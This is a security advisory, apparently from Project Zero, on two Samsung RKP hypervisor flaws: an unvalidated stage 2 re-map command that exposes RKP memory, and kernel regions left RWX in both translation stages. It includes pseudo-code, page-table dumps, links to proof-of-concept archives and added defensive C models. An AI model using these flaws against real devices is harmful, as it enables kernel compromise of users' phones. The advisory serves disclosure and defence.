In order to protect the information processed and stored within RKP (i.e., RKP's heap and stack or the current control-flow protection key), the physical ranges in which RKP and "physmap" are located are unmapped from the stage 2 translation table upon initialization of RKP. This prevents an attacker in EL1 from accessing any of these memory regions, as such an attempt would trigger an s2 translation fault.
However, RKP provides commands which can be used in order to re-map regions in the stage 2 translation table. Most of these commands correctly perform a validation on the given address range using "physmap". However, the "rkp_set_init_page_ro" command (command code 0x51) can be used to mark a region as read-only in stage 2, and performs no such validation. Here is the approximate pseudo-code for this command:
__int64 rkp_set_init_page_ro(unsigned args* args_buffer)
{
    unsigned long page_pa = rkp_get_pa(args_buffer->arg0);
    /* Only the kernel text range is special-cased below; the page is never
       validated against "physmap", so RKP's own physical ranges pass through. */
    if ( page_pa < rkp_get_pa(text) || page_pa >= rkp_get_pa(etext) )
    {
        if ( !rkp_s2_page_change_permission(page_pa, 128LL, 0, 0) )// RO, XN
            return rkp_debug_log("Cred: Unable to set permission for init cred", 0LL, 0LL, 0LL);
    }
    else
    {
        rkp_debug_log("Good init CRED is within RO range", 0LL, 0LL, 0LL);
    }
    rkp_debug_log("init cred page", 0LL, 0LL, 0LL);
    return rkp_set_pgt_bitmap(page_pa, 0);
}
The "rkp_s2_page_change_permission" function makes sure the given page is mapped in stage 2 (and if it isn't, it re-maps it). The arguments passed in by "rkp_set_init_page_ro" in this specific case mark the page as read-only and non-executable.
Regardless, the physical address ranges for RKP are already present in the stage 1 translation table:
...
[424] 0x0b5000000-0x0b5200000 [PXN: 1, UXN: 1, AP: 0]
[425] 0x0b5200000-0x0b5400000 [PXN: 1, UXN: 1, AP: 0]
[426] 0x0b5400000-0x0b5600000 [PXN: 1, UXN: 1, AP: 0]
[427] 0x0b5600000-0x0b5800000 [PXN: 1, UXN: 1, AP: 0]
[428] 0x0b5800000-0x0b5a00000 [PXN: 1, UXN: 1, AP: 0]
...
This means an attacker can simply invoke the "rkp_set_init_page_ro" command to s2-map any wanted page, and will subsequently be able to directly read from that page, even if it resides within RKP's physical address range.
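As an added illustration (not RKP's code and not the issue's PoC), the following toy C model keeps a stage 2 presence map and shows the command in its unchecked form beside a hardened form that validates the page against a protected range before re-mapping; the addresses, table size and return codes are constructed for the model.

```c
/* Toy model of an RKP-style stage 2 map and the re-map command discussed above.
 * Added illustration, not RKP code: table layout, addresses and return codes are
 * constructed; only the missing range check comes from the advisory. */
#include <stdbool.h>
#include <stdint.h>
#define PAGE_SHIFT 12
#define S2_BASE    0xb5000000ULL   /* first PA the toy table covers */
#define S2_PAGES   0x1000          /* 16 MiB of 4 KiB pages */
/* Range RKP keeps unmapped from EL1 (its own memory, "physmap"); constructed. */
#define PROT_START 0xb5200000ULL
#define PROT_END   0xb5400000ULL

/* Stage 2 presence bit per page; an unmapped page faults on EL1 access. */
static bool s2_mapped[S2_PAGES];

static int s2_index(uint64_t pa)
{
    if (pa < S2_BASE || pa >= S2_BASE + ((uint64_t)S2_PAGES << PAGE_SHIFT))
        return -1;
    return (int)((pa - S2_BASE) >> PAGE_SHIFT);
}

/* Stand-in for rkp_s2_page_change_permission(pa, RO, XN): maps the page if
 * absent, then applies the permissions (only presence is modelled here). */
static int s2_page_set_ro_xn(uint64_t pa)
{
    int idx = s2_index(pa);
    if (idx < 0) return -1;
    s2_mapped[idx] = true;
    return 0;
}

/* Pattern from the advisory: no validation, so a page inside the protected
 * range is mapped back into stage 2 and becomes readable from EL1. */
int set_init_page_ro_unchecked(uint64_t pa) { return s2_page_set_ro_xn(pa); }

/* Hardened pattern: validate the page before touching stage 2. */
int set_init_page_ro_checked(uint64_t pa)
{
    if (pa & ((1ULL << PAGE_SHIFT) - 1))    return -2;   /* not page aligned */
    if (pa >= PROT_START && pa < PROT_END)  return -3;   /* protected memory */
    return s2_page_set_ro_xn(pa);
}

/* What an EL1 read sees: succeeds only when stage 2 has a mapping. */
bool el1_can_read(uint64_t pa)
{
    int idx = s2_index(pa);
    return idx >= 0 && s2_mapped[idx];
}
```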
I've verified this issue on an SM-G935F device, build version "XXS1APG3". The RKP version present on the device is "RKP4.2_CL7572479".
Proof of concept for the RKP stage 2 remapping issue.
This PoC s2-remaps RKP's physical address range and reads from it in EL1.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41218.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=981
As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.
One of the protections implemented by RKP is a security policy meant to ensure that only the "authentic" kernel code pages are executable from EL1. This mitigation is achieved by combining a few memory protection policies together, namely:
- All pages with the exception of the kernel code are marked PXN
- All kernel code pages are marked read-only in the stage 2 translation table
- Kernel data pages are never marked executable
- Kernel code pages are never marked writable
(for more information, see https://www2.samsungknox.com/en/blog/real-time-kernel-protection-rkp)
In order to explore this mitigation technique, I've written a small tool to dump the stage 1 and stage 2 translation tables for EL0/EL1. First, the initial stage 2 translation table is embedded in the VMM code, so it can be statically retrieved and analysed. Here is a short snippet from the initial stage 2 translation table (the addresses here are PAs, although RKP implements a one-to-one PA<->IPA translation, barring memory protections):
...
0x80000000-0x80200000: S2AP=11, XN=0
0x80200000-0x80400000: S2AP=11, XN=0
0x80400000-0x80600000: S2AP=11, XN=0
0x80600000-0x80800000: S2AP=11, XN=0
0x80800000-0x80a00000: S2AP=11, XN=0
0x80a00000-0x80c00000: S2AP=11, XN=0
0x80c00000-0x80e00000: S2AP=11, XN=0
0x80e00000-0x81000000: S2AP=11, XN=0
0x81000000-0x81200000: S2AP=11, XN=0
0x81200000-0x81400000: S2AP=11, XN=0
0x81400000-0x81600000: S2AP=11, XN=0
...
The physical address range above corresponds with the physical address range in which the kernel code is located. As can be seen above, this entire address range is mapped as RWX in the initial stage 2. However, obviously RKP does not leave this area unprotected, as this might allow an attacker to subvert the kernel's integrity (by writing to the kernel's code pages). When RKP is initialized (i.e., when the HVC command RKP_INIT is called from EL1), the HLOS kernel passes a structure containing the address ranges for the currently loaded kernel. Here is a short snippet from "rkp_init" (init/main.c):
static void rkp_init(void)
{
    rkp_init_t init;
    init.magic = RKP_INIT_MAGIC;
    init.vmalloc_start = VMALLOC_START;
    init.vmalloc_end = (u64)high_memory;
    init.init_mm_pgd = (u64)__pa(swapper_pg_dir);
    init.id_map_pgd = (u64)__pa(idmap_pg_dir);
    init.rkp_pgt_bitmap = (u64)__pa(rkp_pgt_bitmap);
    init.rkp_map_bitmap = (u64)__pa(rkp_map_bitmap);
    init.rkp_pgt_bitmap_size = RKP_PGT_BITMAP_LEN;
    init.zero_pg_addr = page_to_phys(empty_zero_page);
    init._text = (u64) _text;
    init._etext = (u64) _etext;
    if (!vmm_extra_mem) {
        printk(KERN_ERR"Disable RKP: Failed to allocate extra mem\n");
        return;
    }
    init.extra_memory_addr = __pa(vmm_extra_mem);
    init.extra_memory_size = 0x600000;
    init._srodata = (u64) __start_rodata;
    init._erodata = (u64) __end_rodata;
    init.large_memory = rkp_support_large_memory;
    rkp_call(RKP_INIT, (u64)&init, 0, 0, 0, 0);
}
Upon receiving this command, RKP changes the stage 2 permissions for the address range corresponding to the kernel text (from "init._text" to "init._etext") to read-only and executable, like so:
...
kernel_text_phys_start = rkp_get_pa(text);
kernel_text_phys_end = rkp_get_pa(etext);
rkp_debug_log("DEFERRED INIT START", 0LL, 0LL, 0LL);
if ( etext & 0x1FFFFF )
    rkp_debug_log("Kernel range is not aligned", 0LL, 0LL, 0LL);
if ( !rkp_s2_range_change_permission(kernel_text_phys_start, kernel_text_phys_end, 128LL, 1, 1) )
    rkp_debug_log("Failed to make Kernel range RO", 0LL, 0LL, 0LL);
rkp_l1pgt_process_table(init_mm_pgd, 1u, 1u);
...
However, notice that the code above only marks the region from _text to _etext as read-only. This region is *strictly smaller* than the physical address range reserved for the kernel text region (in part in order to account for RKP's KASLR slide, which means the kernel can be placed at several offsets within this region). If we take a look at the stage 1 translation table from TTBR1_EL1, we can see that the kernel code pages are allocated using L2 block descriptors (i.e., a large granularity), like so:
...
[256] L1 table [PXNTable: 0, APTable: 0]
[ 0] 0x080000000-0x080200000 [PXN: 0, UXN: 1, AP: 0]
[ 1] 0x080200000-0x080400000 [PXN: 0, UXN: 1, AP: 0]
[ 2] 0x080400000-0x080600000 [PXN: 0, UXN: 1, AP: 0]
[ 3] 0x080600000-0x080800000 [PXN: 0, UXN: 1, AP: 0]
[ 4] 0x080800000-0x080a00000 [PXN: 0, UXN: 1, AP: 0]
[ 5] 0x080a00000-0x080c00000 [PXN: 0, UXN: 1, AP: 0]
[ 6] 0x080c00000-0x080e00000 [PXN: 0, UXN: 1, AP: 0]
[ 7] 0x080e00000-0x081000000 [PXN: 0, UXN: 1, AP: 0]
[ 8] 0x081000000-0x081200000 [PXN: 0, UXN: 1, AP: 0]
[ 9] 0x081200000-0x081400000 [PXN: 0, UXN: 1, AP: 0]
[ 10] 0x081400000-0x081600000 [PXN: 1, UXN: 1, AP: 0]
...
Moreover, as we can see above, the region 0x080000000-0x081400000 is marked as RWX in the stage 1 translation table, even though the kernel code pages only take up a much smaller area within this region.
Combining these facts, we arrive at the conclusion that any address in the ranges 0x080000000-"_text" and "_etext"-0x081400000 is marked as RWX both in stage 1 and stage 2, even after RKP is initialized.
This issue can be reproduced by simply writing code to any of these memory regions in EL1 and executing it directly (e.g., writing code to address 0xffffffc000000000 in the kernel's VAS).
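As an added example (not the author's dump tool), here is a small C audit that parses the two dump formats quoted above and totals the bytes that are RWX in both stages yet lie outside [_text, _etext); the dump lines are taken from the page, while the _text/_etext values are constructed.

```c
/* Audit of the dump format quoted above: sums bytes RWX in stage 1 (PXN: 0, AP: 0)
 * and in stage 2 (S2AP=11, XN=0) that lie outside [_text, _etext).  Added example,
 * not the author's tool; dump lines are from the page, _text/_etext constructed. */
#include <stdio.h>
#include <inttypes.h>
struct blk { uint64_t start, end; int rwx; };
/* Parses either line shape; headers and "..." lines return 0 and are skipped. */
static int parse_blk(const char *line, struct blk *b)
{
    int pxn, ap, s2ap, xn;
    if (sscanf(line, " [%*d] 0x%" SCNx64 "-0x%" SCNx64 " [PXN: %d, UXN: %*d, AP: %d]",
               &b->start, &b->end, &pxn, &ap) == 4)
        { b->rwx = (pxn == 0 && ap == 0); return 1; }     /* stage 1: EL1 RW + exec */
    if (sscanf(line, "0x%" SCNx64 "-0x%" SCNx64 ": S2AP=%d, XN=%d",
               &b->start, &b->end, &s2ap, &xn) == 4)
        { b->rwx = (s2ap == 11 && xn == 0); return 1; }   /* stage 2: RW + exec */
    return 0;
}
static uint64_t span(uint64_t lo, uint64_t hi) { return hi > lo ? hi - lo : 0; }

/* Total bytes RWX in both stages and outside [text, etext). */
uint64_t audit_rwx(const char *const *s1, int n1, const char *const *s2, int n2,
                   uint64_t text, uint64_t etext)
{
    uint64_t total = 0;
    struct blk a, b;
    for (int i = 0; i < n1; i++) {
        if (!parse_blk(s1[i], &a) || !a.rwx) continue;
        for (int j = 0; j < n2; j++) {
            if (!parse_blk(s2[j], &b) || !b.rwx) continue;
            uint64_t lo = a.start > b.start ? a.start : b.start;
            uint64_t hi = a.end < b.end ? a.end : b.end;
            if (lo < hi)                                      /* blocks overlap */
                total += span(lo, hi < text ? hi : text)      /* below _text  */
                       + span(lo > etext ? lo : etext, hi);   /* above _etext */
        }
    }
    return total;
}
/* Entries copied from the two dumps on the page; _text/_etext are constructed. */
uint64_t audit_sample(void)
{
    static const char *const s1[] = { "[256] L1 table [PXNTable: 0, APTable: 0]",
        "[  0] 0x080000000-0x080200000 [PXN: 0, UXN: 1, AP: 0]",
        "[  1] 0x080200000-0x080400000 [PXN: 0, UXN: 1, AP: 0]",
        "[ 10] 0x081400000-0x081600000 [PXN: 1, UXN: 1, AP: 0]" };
    static const char *const s2[] = { "0x80000000-0x80200000: S2AP=11, XN=0",
        "0x80200000-0x80400000: S2AP=11, XN=0", "0x81400000-0x81600000: S2AP=11, XN=0" };
    return audit_rwx(s1, 4, s2, 3, 0x80080000ULL, 0x80300000ULL);   /* -> 0x180000 */
}
```

With the constructed text range, the 0x80000 bytes below _text and the 0x100000 bytes above _etext are the pieces that stay RWX in both stages; the PXN: 1 block is correctly excluded.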
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41217.zip